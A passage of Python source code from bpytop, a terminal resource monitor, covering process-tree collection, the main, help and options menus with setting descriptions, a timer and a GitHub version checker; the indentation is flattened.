else: cls.details["io_write"] = "?"
else:
if cls.expand > 2:
if hasattr(cls.details["io_counters"], "read_bytes"): cls.details["io_read"] = floating_humanizer(cls.details["io_counters"].read_bytes)
else: cls.details["io_read"] = "?"
if cls.expand > 3:
if hasattr(cls.details["io_counters"], "write_bytes"): cls.details["io_write"] = floating_humanizer(cls.details["io_counters"].write_bytes)
else: cls.details["io_write"] = "?"
if cls.expand > 4 : cls.details["terminal"] = f'{cls.details["terminal"]}'.replace("/dev/", "")
cls.details_cpu.append(cls.details["cpu_percent"])
mem = cls.details["memory_percent"]
if mem > 80: mem = round(mem)
elif mem > 60: mem = round(mem * 1.2)
elif mem > 30: mem = round(mem * 1.5)
elif mem > 10: mem = round(mem * 2)
elif mem > 5: mem = round(mem * 10)
else: mem = round(mem * 20)
cls.details_mem.append(mem)
if len(cls.details_cpu) > ProcBox.width: del cls.details_cpu[0]
if len(cls.details_mem) > ProcBox.width: del cls.details_mem[0]
@classmethod
def _tree(cls, sort_cmd, reverse: bool, proc_per_cpu: bool, search: str):
'''List all processess in a tree view with pid, name, threads, username, memory percent and cpu percent'''
out: Dict = {}
err: float = 0.0
det_cpu: float = 0.0
infolist: Dict = {}
cls.tree_counter += 1
tree = defaultdict(list)
n: int = 0
for p in sorted(psutil.process_iter(cls.p_values + (["memory_info"] if CONFIG.proc_mem_bytes else []), err), key=lambda p: eval(sort_cmd), reverse=reverse):
if cls.collect_interrupt: return
try:
tree[p.ppid()].append(p.pid)
except (psutil.NoSuchProcess, psutil.ZombieProcess):
pass
else:
infolist[p.pid] = p.info
n += 1
if 0 in tree and 0 in tree[0]:
tree[0].remove(0)
def create_tree(pid: int, tree: defaultdict, indent: str = "", inindent: str = " ", found: bool = False, depth: int = 0, collapse_to: Union[None, int] = None):
nonlocal infolist, proc_per_cpu, search, out, det_cpu
name: str; threads: int; username: str; mem: float; cpu: float; collapse: bool = False
cont: bool = True
getinfo: Dict = {}
if cls.collect_interrupt: return
try:
name = psutil.Process(pid).name()
if name == "idle": return
except psutil.Error:
pass
cont = False
name = ""
if pid in infolist:
getinfo = infolist[pid]
if search and not found:
if cls.detailed and pid == cls.detailed_pid:
det_cpu = getinfo["cpu_percent"]
if "username" in getinfo and isinstance(getinfo["username"], float): getinfo["username"] = ""
if "cmdline" in getinfo and isinstance(getinfo["cmdline"], float): getinfo["cmdline"] = ""
for value in [ name, str(pid), getinfo.get("username", ""), " ".join(getinfo.get("cmdline", "")) ]:
for s in search.split(","):
if s.strip() in value:
found = True
break
else: continue
break
else: cont = False
if cont:
if getinfo:
if getinfo["num_threads"] == err: threads = 0
else: threads = getinfo["num_threads"]
if getinfo["username"] == err: username = ""
else: username = getinfo["username"]
cpu = getinfo["cpu_percent"] if proc_per_cpu else round(getinfo["cpu_percent"] / THREADS, 2)
mem = getinfo["memory_percent"]
if getinfo["cmdline"] == err: cmd = ""
else: cmd = " ".join(getinfo["cmdline"]) or "[" + getinfo["name"] + "]"
if CONFIG.proc_mem_bytes and hasattr(getinfo["memory_info"], "rss"):
mem_b = getinfo["memory_info"].rss
else:
mem_b = 0
else:
threads = mem_b = 0
username = ""
mem = cpu = 0.0
if pid in cls.collapsed:
collapse = cls.collapsed[pid]
else:
collapse = depth > CONFIG.tree_depth
cls.collapsed[pid] = collapse
if collapse_to and not search:
out[collapse_to]["threads"] += threads
out[collapse_to]["mem"] += mem
out[collapse_to]["mem_b"] += mem_b
out[collapse_to]["cpu"] += cpu
else:
if pid in tree and len(tree[pid]) > 0:
sign: str = "+" if collapse else "-"
inindent = inindent.replace(" ├─ ", "[" + sign + "]─").replace(" └─ ", "[" + sign + "]─")
out[pid] = {
"indent" : inindent,
"name": name,
"cmd" : cmd.replace("\n", "").replace("\t", "").replace("\\", ""),
"threads" : threads,
"username" : username,
"mem" : mem,
"mem_b" : mem_b,
"cpu" : cpu,
"depth" : depth,
}
if search: collapse = False
elif collapse and not collapse_to:
collapse_to = pid
if pid not in tree:
return
children = tree[pid][:-1]
for child in children:
create_tree(child, tree, indent + " │ ", indent + " ├─ ", found=found, depth=depth+1, collapse_to=collapse_to)
create_tree(tree[pid][-1], tree, indent + " ", indent + " └─ ", depth=depth+1, collapse_to=collapse_to)
create_tree(min(tree), tree)
cls.det_cpu = det_cpu
if cls.collect_interrupt: return
if cls.tree_counter >= 100:
cls.tree_counter = 0
for pid in list(cls.collapsed):
if not psutil.pid_exists(pid):
del cls.collapsed[pid]
cls.num_procs = len(out)
cls.processes = out.copy()
@classmethod
def sorting(cls, key: str):
index: int = CONFIG.sorting_options.index(CONFIG.proc_sorting) + (1 if key == "right" else -1)
if index >= len(CONFIG.sorting_options): index = 0
elif index < 0: index = len(CONFIG.sorting_options) - 1
CONFIG.proc_sorting = CONFIG.sorting_options[index]
if "left" in Key.mouse: del Key.mouse["left"]
Collector.collect(ProcCollector, interrupt=True, redraw=True)
@classmethod
def _draw(cls):
ProcBox._draw_fg()
class Menu:
'''Holds all menus'''
active: bool = False
close: bool = False
resized: bool = True
menus: Dict[str, Dict[str, str]] = {}
menu_length: Dict[str, int] = {}
background: str = ""
for name, menu in MENUS.items():
menu_length[name] = len(menu["normal"][0])
menus[name] = {}
for sel in ["normal", "selected"]:
menus[name][sel] = ""
for i in range(len(menu[sel])):
menus[name][sel] += Fx.trans(f'{Color.fg(MENU_COLORS[sel][i])}{menu[sel][i]}')
if i < len(menu[sel]) - 1: menus[name][sel] += f'{Mv.d(1)}{Mv.l(len(menu[sel][i]))}'
@classmethod
def main(cls):
out: str = ""
banner: str = ""
redraw: bool = True
key: str = ""
mx: int = 0
my: int = 0
skip: bool = False
mouse_over: bool = False
mouse_items: Dict[str, Dict[str, int]] = {}
cls.active = True
cls.resized = True
menu_names: List[str] = list(cls.menus.keys())
menu_index: int = 0
menu_current: str = menu_names[0]
cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
while not cls.close:
key = ""
if cls.resized:
banner = (f'{Banner.draw(Term.height // 2 - 10, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
if UpdateChecker.version != VERSION:
banner += f'{Mv.to(Term.height, 1)}{Fx.b}{THEME.title}New release {UpdateChecker.version} available at https://github.com/aristocratos/bpytop{Fx.ub}{Term.fg}'
cy = 0
for name, menu in cls.menus.items():
ypos = Term.height // 2 - 2 + cy
xpos = Term.width // 2 - (cls.menu_length[name] // 2)
mouse_items[name] = { "x1" : xpos, "x2" : xpos + cls.menu_length[name] - 1, "y1" : ypos, "y2" : ypos + 2 }
cy += 3
redraw = True
cls.resized = False
if redraw:
out = ""
for name, menu in cls.menus.items():
out += f'{Mv.to(mouse_items[name]["y1"], mouse_items[name]["x1"])}{menu["selected" if name == menu_current else "normal"]}'
if skip and redraw:
Draw.now(out)
elif not skip:
Draw.now(f'{cls.background}{banner}{out}')
skip = redraw = False
if Key.input_wait(Timer.left(), mouse=True):
if Key.mouse_moved():
mx, my = Key.get_mouse()
for name, pos in mouse_items.items():
if pos["x1"] <= mx <= pos["x2"] and pos["y1"] <= my <= pos["y2"]:
mouse_over = True
if name != menu_current:
menu_current = name
menu_index = menu_names.index(name)
redraw = True
break
else:
mouse_over = False
else:
key = Key.get()
if key == "mouse_click" and not mouse_over:
key = "M"
if key == "q":
clean_quit()
elif key in ["escape", "M"]:
cls.close = True
break
elif key in ["up", "mouse_scroll_up", "shift_tab"]:
menu_index -= 1
if menu_index < 0: menu_index = len(menu_names) - 1
menu_current = menu_names[menu_index]
redraw = True
elif key in ["down", "mouse_scroll_down", "tab"]:
menu_index += 1
if menu_index > len(menu_names) - 1: menu_index = 0
menu_current = menu_names[menu_index]
redraw = True
elif key == "enter" or (key == "mouse_click" and mouse_over):
if menu_current == "quit":
clean_quit()
elif menu_current == "options":
cls.options()
cls.resized = True
elif menu_current == "help":
cls.help()
cls.resized = True
if Timer.not_zero() and not cls.resized:
skip = True
else:
Collector.collect()
Collector.collect_done.wait(2)
if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
Timer.stamp()
Draw.now(f'{Draw.saved_buffer()}')
cls.background = ""
cls.active = False
cls.close = False
@classmethod
def help(cls):
out: str = ""
out_misc : str = ""
redraw: bool = True
key: str = ""
skip: bool = False
main_active: bool = cls.active
cls.active = True
cls.resized = True
if not cls.background:
cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
help_items: Dict[str, str] = {
"(Mouse 1)" : "Clicks buttons and selects in process list.",
"Selected (Mouse 1)" : "Show detailed information for selected process.",
"(Mouse scroll)" : "Scrolls any scrollable list/text under cursor.",
"(Esc, shift+m)" : "Toggles main menu.",
"(m)" : "Change current view mode, order full->proc->stat.",
"(F2, o)" : "Shows options.",
"(F1, h)" : "Shows this window.",
"(ctrl+z)" : "Sleep program and put in background.",
"(ctrl+c, q)" : "Quits program.",
"(+) / (-)" : "Add/Subtract 100ms to/from update timer.",
"(Up) (Down)" : "Select in process list.",
"(Enter)" : "Show detailed information for selected process.",
"(Spacebar)" : "Expand/collapse the selected process in tree view.",
"(Pg Up) (Pg Down)" : "Jump 1 page in process list.",
"(Home) (End)" : "Jump to first or last page in process list.",
"(Left) (Right)" : "Select previous/next sorting column.",
"(b) (n)" : "Select previous/next network device.",
"(z)" : "Toggle totals reset for current network device",
"(a)" : "Toggle auto scaling for the network graphs.",
"(y)" : "Toggle synced scaling mode for network graphs.",
"(f)" : "Input a string to filter processes with.",
"(c)" : "Toggle per-core cpu usage of processes.",
"(r)" : "Reverse sorting order in processes box.",
"(e)" : "Toggle processes tree view.",
"(delete)" : "Clear any entered filter.",
"Selected (T, t)" : "Terminate selected process with SIGTERM - 15.",
"Selected (K, k)" : "Kill selected process with SIGKILL - 9.",
"Selected (I, i)" : "Interrupt selected process with SIGINT - 2.",
"_1" : " ",
"_2" : "For bug reporting and project updates, visit:",
"_3" : "https://github.com/aristocratos/bpytop",
}
while not cls.close:
key = ""
if cls.resized:
y = 8 if Term.height < len(help_items) + 10 else Term.height // 2 - len(help_items) // 2 + 4
out_misc = (f'{Banner.draw(y-7, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
x = Term.width//2-36
h, w = Term.height-2-y, 72
if len(help_items) > h:
pages = ceil(len(help_items) / h)
else:
h = len(help_items)
pages = 0
page = 1
out_misc += create_box(x, y, w, h+3, "help", line_color=THEME.div_line)
redraw = True
cls.resized = False
if redraw:
out = ""
cy = 0
if pages:
out += (f'{Mv.to(y, x+56)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title("pg")}{Fx.ub}{THEME.main_fg(Symbol.up)} {Fx.b}{THEME.title}{page}/{pages} '
f'pg{Fx.ub}{THEME.main_fg(Symbol.down)}{THEME.div_line(Symbol.title_right)}')
out += f'{Mv.to(y+1, x+1)}{THEME.title}{Fx.b}{"Keys:":^20}Description:{THEME.main_fg}'
for n, (keys, desc) in enumerate(help_items.items()):
if pages and n < (page - 1) * h: continue
out += f'{Mv.to(y+2+cy, x+1)}{Fx.b}{("" if keys.startswith("_") else keys):^20.20}{Fx.ub}{desc:50.50}'
cy += 1
if cy == h: break
if cy < h:
for i in range(h-cy):
out += f'{Mv.to(y+2+cy+i, x+1)}{" " * (w-2)}'
if skip and redraw:
Draw.now(out)
elif not skip:
Draw.now(f'{cls.background}{out_misc}{out}')
skip = redraw = False
if Key.input_wait(Timer.left()):
key = Key.get()
if key == "mouse_click":
mx, my = Key.get_mouse()
if x <= mx < x + w and y <= my < y + h + 3:
if pages and my == y and x + 56 < mx < x + 61:
key = "up"
elif pages and my == y and x + 63 < mx < x + 68:
key = "down"
else:
key = "escape"
if key == "q":
clean_quit()
elif key in ["escape", "M", "enter", "backspace", "h", "f1"]:
cls.close = True
break
elif key in ["up", "mouse_scroll_up", "page_up"] and pages:
page -= 1
if page < 1: page = pages
redraw = True
elif key in ["down", "mouse_scroll_down", "page_down"] and pages:
page += 1
if page > pages: page = 1
redraw = True
if Timer.not_zero() and not cls.resized:
skip = True
else:
Collector.collect()
Collector.collect_done.wait(2)
if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
Timer.stamp()
if main_active:
cls.close = False
return
Draw.now(f'{Draw.saved_buffer()}')
cls.background = ""
cls.active = False
cls.close = False
@classmethod
def options(cls):
out: str = ""
out_misc : str = ""
redraw: bool = True
key: str = ""
skip: bool = False
main_active: bool = cls.active
cls.active = True
cls.resized = True
d_quote: str
inputting: bool = False
input_val: str = ""
global ARG_MODE
Theme.refresh()
if not cls.background:
cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
option_items: Dict[str, List[str]] = {
"color_theme" : [
'Set color theme.',
'',
'Choose from all theme files in',
'"/usr/[local/]share/bpytop/themes" and',
'"~/.config/bpytop/themes".',
'',
'"Default" for builtin default theme.',
'User themes are prefixed by a plus sign "+".',
'',
'For theme updates see:',
'https://github.com/aristocratos/bpytop'],
"theme_background" : [
'If the theme set background should be shown.',
'',
'Set to False if you want terminal background',
'transparency.'],
"view_mode" : [
'Set bpytop view mode.',
'',
'"full" for everything shown.',
'"proc" for cpu stats and processes.',
'"stat" for cpu, mem, disks and net stats shown.'],
"update_ms" : [
'Update time in milliseconds.',
'',
'Recommended 2000 ms or above for better sample',
'times for graphs.',
'',
'Min value: 100 ms',
'Max value: 86400000 ms = 24 hours.'],
"proc_sorting" : [
'Processes sorting option.',
'',
'Possible values: "pid", "program", "arguments",',
'"threads", "user", "memory", "cpu lazy" and',
'"cpu responsive".',
'',
'"cpu lazy" updates top process over time,',
'"cpu responsive" updates top process directly.'],
"proc_reversed" : [
'Reverse processes sorting order.',
'',
'True or False.'],
"proc_tree" : [
'Processes tree view.',
'',
'Set true to show processes grouped by parents,',
'with lines drawn between parent and child',
'process.'],
"tree_depth" : [
'Process tree auto collapse depth.',
'',
'Sets the depth were the tree view will auto',
'collapse processes at.'],
"proc_colors" : [
'Enable colors in process view.',
'',
'Uses the cpu graph gradient colors.'],
"proc_gradient" : [
'Enable process view gradient fade.',
'',
'Fades from top or current selection.',
'Max fade value is equal to current themes',
'"inactive_fg" color value.'],
"proc_per_core" : [
'Process usage per core.',
'',
'If process cpu usage should be of the core',
'it\'s running on or usage of the total',
'available cpu power.',
'',
'If true and process is multithreaded',
'cpu usage can reach over 100%.'],
"proc_mem_bytes" : [
'Show memory as bytes in process list.',
' ',
'True or False.'
],
"check_temp" : [
'Enable cpu temperature reporting.',
'',
'True or False.'],
"cpu_sensor" : [
'Cpu temperature sensor',
'',
'Select the sensor that corresponds to',
'your cpu temperature.',
'Set to "Auto" for auto detection.'],
"show_coretemp" : [
'Show temperatures for cpu cores.',
'',
'Only works if check_temp is True and',
'the system is reporting core temps.'],
"draw_clock" : [
'Draw a clock at top of screen.',
'',
'Formatting according to strftime, empty',
'string to disable.',
'',
'Custom formatting options:',
'"/host" = hostname',
'"/user" = username',
'',
'Examples of strftime formats:',
'"%X" = locale HH:MM:SS',
'"%H" = 24h hour, "%I" = 12h hour',
'"%M" = minute, "%S" = second',
'"%d" = day, "%m" = month, "%y" = year'],
"background_update" : [
'Update main ui when menus are showing.',
'',
'True or False.',
'',
'Set this to false if the menus is flickering',
'too much for a comfortable experience.'],
"custom_cpu_name" : [
'Custom cpu model name in cpu percentage box.',
'',
'Empty string to disable.'],
"disks_filter" : [
'Optional filter for shown disks.',
'',
'Should be last folder in path of a mountpoint,',
'"root" replaces "/", separate multiple values',
'with a comma.',
'Begin line with "exclude=" to change to exclude',
'filter.',
'Oterwise defaults to "most include" filter.',
'',
'Example: disks_filter="exclude=boot, home"'],
"mem_graphs" : [
'Show graphs for memory values.',
'',
'True or False.'],
"show_swap" : [
'If swap memory should be shown in memory box.',
'',
'True or False.'],
"swap_disk" : [
'Show swap as a disk.',
'',
'Ignores show_swap value above.',
'Inserts itself after first disk.'],
"show_disks" : [
'Split memory box to also show disks.',
'',
'True or False.'],
"net_download" : [
'Fixed network graph download value.',
'',
'Default "10M" = 10 MibiBytes.',
'Possible units:',
'"K" (KiB), "M" (MiB), "G" (GiB).',
'',
'Append "bit" for bits instead of bytes,',
'i.e "100Mbit"',
'',
'Can be toggled with auto button.'],
"net_upload" : [
'Fixed network graph upload value.',
'',
'Default "10M" = 10 MibiBytes.',
'Possible units:',
'"K" (KiB), "M" (MiB), "G" (GiB).',
'',
'Append "bit" for bits instead of bytes,',
'i.e "100Mbit"',
'',
'Can be toggled with auto button.'],
"net_auto" : [
'Start in network graphs auto rescaling mode.',
'',
'Ignores any values set above at start and',
'rescales down to 10KibiBytes at the lowest.',
'',
'True or False.'],
"net_sync" : [
'Network scale sync.',
'',
'Syncs the scaling for download and upload to',
'whichever currently has the highest scale.',
'',
'True or False.'],
"net_color_fixed" : [
'Set network graphs color gradient to fixed.',
'',
'If True the network graphs color is based',
'on the total bandwidth usage instead of',
'the current autoscaling.',
'',
'The bandwidth usage is based on the',
'"net_download" and "net_upload" values set',
'above.'],
"show_battery" : [
'Show battery stats.',
'',
'Show battery stats in the top right corner',
'if a battery is present.'],
"show_init" : [
'Show init screen at startup.',
'',
'The init screen is purely cosmetical and',
'slows down start to show status messages.'],
"update_check" : [
'Check for updates at start.',
'',
'Checks for latest version from:',
'https://github.com/aristocratos/bpytop'],
"log_level" : [
'Set loglevel for error.log',
'',
'Levels are: "ERROR" "WARNING" "INFO" "DEBUG".',
'The level set includes all lower levels,',
'i.e. "DEBUG" will show all logging info.']
}
option_len: int = len(option_items) * 2
sorting_i: int = CONFIG.sorting_options.index(CONFIG.proc_sorting)
loglevel_i: int = CONFIG.log_levels.index(CONFIG.log_level)
view_mode_i: int = CONFIG.view_modes.index(CONFIG.view_mode)
cpu_sensor_i: int = CONFIG.cpu_sensors.index(CONFIG.cpu_sensor)
color_i: int
while not cls.close:
key = ""
if cls.resized:
y = 9 if Term.height < option_len + 10 else Term.height // 2 - option_len // 2 + 4
out_misc = (f'{Banner.draw(y-7, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
x = Term.width//2-38
x2 = x + 27
h, w, w2 = Term.height-2-y, 26, 50
h -= h % 2
color_i = list(Theme.themes).index(THEME.current)
if option_len > h:
pages = ceil(option_len / h)
else:
h = option_len
pages = 0
page = 1
selected_int = 0
out_misc += create_box(x, y, w, h+2, "options", line_color=THEME.div_line)
redraw = True
cls.resized = False
if redraw:
out = ""
cy = 0
selected = list(option_items)[selected_int]
if pages:
out += (f'{Mv.to(y+h+1, x+11)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title("pg")}{Fx.ub}{THEME.main_fg(Symbol.up)} {Fx.b}{THEME.title}{page}/{pages} '
f'pg{Fx.ub}{THEME.main_fg(Symbol.down)}{THEME.div_line(Symbol.title_right)}')
#out += f'{Mv.to(y+1, x+1)}{THEME.title}{Fx.b}{"Keys:":^20}Description:{THEME.main_fg}'
for n, opt in enumerate(option_items):
if pages and n < (page - 1) * ceil(h / 2): continue
value = getattr(CONFIG, opt)
t_color = f'{THEME.selected_bg}{THEME.selected_fg}' if opt == selected else f'{THEME.title}'
v_color = "" if opt == selected else f'{THEME.title}'
d_quote = '"' if isinstance(value, str) else ""
if opt == "color_theme":
counter = f' {color_i + 1}/{len(Theme.themes)}'
elif opt == "proc_sorting":
counter = f' {sorting_i + 1}/{len(CONFIG.sorting_options)}'
elif opt == "log_level":
counter = f' {loglevel_i + 1}/{len(CONFIG.log_levels)}'
elif opt == "view_mode":
counter = f' {view_mode_i + 1}/{len(CONFIG.view_modes)}'
elif opt == "cpu_sensor":
counter = f' {cpu_sensor_i + 1}/{len(CONFIG.cpu_sensors)}'
else:
counter = ""
out += f'{Mv.to(y+1+cy, x+1)}{t_color}{Fx.b}{opt.replace("_", " ").capitalize() + counter:^24.24}{Fx.ub}{Mv.to(y+2+cy, x+1)}{v_color}'
if opt == selected:
if isinstance(value, bool) or opt in ["color_theme", "proc_sorting", "log_level", "view_mode", "cpu_sensor"]:
out += f'{t_color} {Symbol.left}{v_color}{d_quote + str(value) + d_quote:^20.20}{t_color}{Symbol.right} '
elif inputting:
out += f'{str(input_val)[-17:] + Fx.bl + "█" + Fx.ubl + "" + Symbol.enter:^33.33}'
else:
out += ((f'{t_color} {Symbol.left}{v_color}' if type(value) is int else " ") +
f'{str(value) + " " + Symbol.enter:^20.20}' + (f'{t_color}{Symbol.right} ' if type(value) is int else " "))
else:
out += f'{d_quote + str(value) + d_quote:^24.24}'
out += f'{Term.bg}'
if opt == selected:
h2 = len(option_items[opt]) + 2
y2 = y + (selected_int * 2) - ((page-1) * h)
if y2 + h2 > Term.height: y2 = Term.height - h2
out += f'{create_box(x2, y2, w2, h2, "description", line_color=THEME.div_line)}{THEME.main_fg}'
for n, desc in enumerate(option_items[opt]):
out += f'{Mv.to(y2+1+n, x2+2)}{desc:.48}'
cy += 2
if cy >= h: break
if cy < h:
for i in range(h-cy):
out += f'{Mv.to(y+1+cy+i, x+1)}{" " * (w-2)}'
if not skip or redraw:
Draw.now(f'{cls.background}{out_misc}{out}')
skip = redraw = False
if Key.input_wait(Timer.left()):
key = Key.get()
redraw = True
has_sel = False
if key == "mouse_click" and not inputting:
mx, my = Key.get_mouse()
if x < mx < x + w and y < my < y + h + 2:
mouse_sel = ceil((my - y) / 2) - 1 + ceil((page-1) * (h / 2))
if pages and my == y+h+1 and x+11 < mx < x+16:
key = "page_up"
elif pages and my == y+h+1 and x+19 < mx < x+24:
key = "page_down"
elif my == y+h+1:
pass
elif mouse_sel == selected_int:
if mx < x + 6:
key = "left"
elif mx > x + 19:
key = "right"
else:
key = "enter"
elif mouse_sel < len(option_items):
selected_int = mouse_sel
has_sel = True
else:
key = "escape"
if inputting:
if key in ["escape", "mouse_click"]:
inputting = False
elif key == "enter":
inputting = False
if str(getattr(CONFIG, selected)) != input_val:
if selected == "update_ms":
if not input_val or int(input_val) < 100:
CONFIG.update_ms = 100
elif int(input_val) > 86399900:
CONFIG.update_ms = 86399900
else:
CONFIG.update_ms = int(input_val)
elif selected == "tree_depth":
if not input_val or int(input_val) < 0:
CONFIG.tree_depth = 0
else:
CONFIG.tree_depth = int(input_val)
ProcCollector.collapsed = {}
elif isinstance(getattr(CONFIG, selected), str):
setattr(CONFIG, selected, input_val)
if selected.startswith("net_"):
NetCollector.net_min = {"download" : -1, "upload" : -1}
elif selected == "draw_clock":
Box.clock_on = len(CONFIG.draw_clock) > 0
if not Box.clock_on: Draw.clear("clock", saved=True)
Term.refresh(force=True)
cls.resized = False
elif key == "backspace" and len(input_val):
input_val = input_val[:-1]
elif key == "delete":
input_val = ""
elif isinstance(getattr(CONFIG, selected), str) and len(key) == 1:
input_val += key
elif isinstance(getattr(CONFIG, selected), int) and key.isdigit():
input_val += key
elif key == "q":
clean_quit()
elif key in ["escape", "o", "M", "f2"]:
cls.close = True
break
elif key == "enter" and selected in ["update_ms", "disks_filter", "custom_cpu_name", "net_download", "net_upload", "draw_clock", "tree_depth"]:
inputting = True
input_val = str(getattr(CONFIG, selected))
elif key == "left" and selected == "update_ms" and CONFIG.update_ms - 100 >= 100:
CONFIG.update_ms -= 100
Box.draw_update_ms()
elif key == "right" and selected == "update_ms" and CONFIG.update_ms + 100 <= 86399900:
CONFIG.update_ms += 100
Box.draw_update_ms()
elif key == "left" and selected == "tree_depth" and CONFIG.tree_depth > 0:
CONFIG.tree_depth -= 1
ProcCollector.collapsed = {}
elif key == "right" and selected == "tree_depth":
CONFIG.tree_depth += 1
ProcCollector.collapsed = {}
elif key in ["left", "right"] and isinstance(getattr(CONFIG, selected), bool):
setattr(CONFIG, selected, not getattr(CONFIG, selected))
if selected == "check_temp":
if CONFIG.check_temp:
CpuCollector.get_sensors()
else:
CpuCollector.sensor_method = ""
CpuCollector.got_sensors = False
if selected in ["net_auto", "net_color_fixed", "net_sync"]:
if selected == "net_auto": NetCollector.auto_min = CONFIG.net_auto
NetBox.redraw = True
if selected == "theme_background":
Term.bg = f'{THEME.main_bg}' if CONFIG.theme_background else "\033[49m"
Draw.now(Term.bg)
if selected == "show_battery":
Draw.clear("battery", saved=True)
Term.refresh(force=True)
cls.resized = False
elif key in ["left", "right"] and selected == "color_theme" and len(Theme.themes) > 1:
if key == "left":
color_i -= 1
if color_i < 0: color_i = len(Theme.themes) - 1
elif key == "right":
color_i += 1
if color_i > len(Theme.themes) - 1: color_i = 0
Collector.collect_idle.wait()
CONFIG.color_theme = list(Theme.themes)[color_i]
THEME(CONFIG.color_theme)
Term.refresh(force=True)
Timer.finish()
elif key in ["left", "right"] and selected == "proc_sorting":
ProcCollector.sorting(key)
elif key in ["left", "right"] and selected == "log_level":
if key == "left":
loglevel_i -= 1
if loglevel_i < 0: loglevel_i = len(CONFIG.log_levels) - 1
elif key == "right":
loglevel_i += 1
if loglevel_i > len(CONFIG.log_levels) - 1: loglevel_i = 0
CONFIG.log_level = CONFIG.log_levels[loglevel_i]
errlog.setLevel(getattr(logging, CONFIG.log_level))
errlog.info(f'Loglevel set to {CONFIG.log_level}')
elif key in ["left", "right"] and selected == "cpu_sensor" and len(CONFIG.cpu_sensors) > 1:
if key == "left":
cpu_sensor_i -= 1
if cpu_sensor_i < 0: cpu_sensor_i = len(CONFIG.cpu_sensors) - 1
elif key == "right":
cpu_sensor_i += 1
if cpu_sensor_i > len(CONFIG.cpu_sensors) - 1: cpu_sensor_i = 0
Collector.collect_idle.wait()
CpuCollector.sensor_swap = True
CONFIG.cpu_sensor = CONFIG.cpu_sensors[cpu_sensor_i]
if CONFIG.check_temp and (CpuCollector.sensor_method != "psutil" or CONFIG.cpu_sensor == "Auto"):
CpuCollector.get_sensors()
Term.refresh(force=True)
cls.resized = False
elif key in ["left", "right"] and selected == "view_mode":
if key == "left":
view_mode_i -= 1
if view_mode_i < 0: view_mode_i = len(CONFIG.view_modes) - 1
elif key == "right":
view_mode_i += 1
if view_mode_i > len(CONFIG.view_modes) - 1: view_mode_i = 0
CONFIG.view_mode = CONFIG.view_modes[view_mode_i]
Box.proc_mode = CONFIG.view_mode == "proc"
Box.stat_mode = CONFIG.view_mode == "stat"
if ARG_MODE:
ARG_MODE = ""
Draw.clear(saved=True)
Term.refresh(force=True)
cls.resized = False
elif key == "up":
selected_int -= 1
if selected_int < 0: selected_int = len(option_items) - 1
page = floor(selected_int * 2 / h) + 1
elif key == "down":
selected_int += 1
if selected_int > len(option_items) - 1: selected_int = 0
page = floor(selected_int * 2 / h) + 1
elif key in ["mouse_scroll_up", "page_up"] and pages:
page -= 1
if page < 1: page = pages
selected_int = (page-1) * ceil(h / 2)
elif key in ["mouse_scroll_down", "page_down"] and pages:
page += 1
if page > pages: page = 1
selected_int = (page-1) * ceil(h / 2)
elif has_sel:
pass
else:
redraw = False
if Timer.not_zero() and not cls.resized:
skip = True
else:
Collector.collect()
Collector.collect_done.wait(2)
if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
Timer.stamp()
if main_active:
cls.close = False
return
Draw.now(f'{Draw.saved_buffer()}')
cls.background = ""
cls.active = False
cls.close = False
class Timer:
timestamp: float
return_zero = False
@classmethod
def stamp(cls):
cls.timestamp = time()
@classmethod
def not_zero(cls) -> bool:
if cls.return_zero:
cls.return_zero = False
return False
return cls.timestamp + (CONFIG.update_ms / 1000) > time()
@classmethod
def left(cls) -> float:
return cls.timestamp + (CONFIG.update_ms / 1000) - time()
@classmethod
def finish(cls):
cls.return_zero = True
cls.timestamp = time() - (CONFIG.update_ms / 1000)
Key.break_wait()
class UpdateChecker:
version: str = VERSION
thread: threading.Thread
@classmethod
def run(cls):
cls.thread = threading.Thread(target=cls._checker)
cls.thread.start()
@classmethod
def _checker(cls):
try:
with urllib.request.urlopen("https://github.com/aristocratos/bpytop/raw/master/bpytop.py", timeout=5) as source: # type: ignore
for line in source:
line = line.decode("utf-8")
if line.startswith("VERSION: str ="):
cls.version = line[(line.index("=")+1):].strip('" \n')
break
except Exception as e:
errlog.exception(f'{e}')
else:
if cls.version != VERSION and which("notify-send"):
try:
subprocess.run(["notify-send", "-u", "normal", "BpyTop Update!",
f'New version of BpyTop available!\nCurrent version: {VERSION}\nNew version: {cls.version}\nDownload at github.com/aristocratos/bpytop',
"-i", "update-notifier", "-t", "10000"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
except Exception as e:
errlog.exception(f'{e}')
class Init:
running: bool = True
initbg_colors: List[str] = []
initbg_data: List[int]
initbg_up: Graph
initbg_down: Graph
resized = False
@classmethod
def start(cls):
Draw.buffer("init", z=1)
Draw.buffer("initbg", z=10)
for i in range(51):
for _ in range(2): cls.initbg_colors.append(Color.fg(i, i, i))
Draw.buffer("banner", (f'{Banner.draw(Term.height // 2 - 10, center=True)}{Mv.d(1)}{Mv.l(11)}{Colors.black_bg}{Colors.default}'
f'{Fx.b}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}{Color.fg("#50")}'), z=2)
for _i in range(7):
